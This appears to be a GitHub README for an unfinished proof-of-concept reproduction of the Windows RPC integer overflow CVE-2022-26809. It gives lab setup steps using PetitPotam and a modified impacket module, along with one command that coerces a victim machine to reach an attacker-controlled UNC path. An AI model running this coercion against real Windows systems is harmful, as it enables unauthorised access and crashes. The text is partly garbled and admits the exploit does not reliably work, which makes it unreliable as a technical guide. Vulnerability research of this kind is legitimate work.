This repo just simply research for the CVE, for more detailed ananlysis,please refer here. UPDATE:05/19 2022 This ananlyze hasn’t been finished yet….

UPDATE:05/22 2022 HuanGMz Post and corelight blog show the real vulnerable point:


This vulnerability is triggered like CVE-2021-43893, when send the ESFRPC request to lsass.exe with UNC path, victim will try to access target as client, so it will trigger interger overflow at client API

If have any better solution to trigger this vuln, feel free to submit issue or pr ๐Ÿ™‚


refer here

Because the vulnerability triggered like CVE-2021-43893, just clone the PetitPotam code.

Just prepare environment just like here:

  • trigger: with PetitPotam
  • victim: with Vulnerable rpcrt4.dll
  • attacker: with attacker-server
  1. Run at attacker-server aflter replacing the wit origin one
  2. trigger the victim to access attacker serve with
python -pipe lsarpc -method DecryptFileSrv -debug "user:[email protected]" "\\attacker.path\realfile
  1. It will not cause BSOD usually, enable the page heap for lsass.exe(However, I have not success triggered BSoD, but accroding the windbg, the interger overflow has been triggered)

Old Description Here is reproduce code for Windows RPC Vuln CVE-2022-26809, and it refer


My python version is 3.6.7 Not sure if GetCoalescedBuffer will involve real CVE-2022-26809, just keep it the just try to trigger the vuln functionOSF_SCALL::GetCoalescedBuffer, it wouldn’t cause any crash because dword integer overflow is too hard to reproduce.And the is the python package impacket.dcerpc.v5.rpcrt๏ผŒjust replace it with origin to trigger vuln(Remember to backup the origin one ๐Ÿ™‚ I believe the has a huge of bugs).

If it not work, maybe wireshark can help to locate the bug.


if necessary, just use nmake to rebuild it


View Github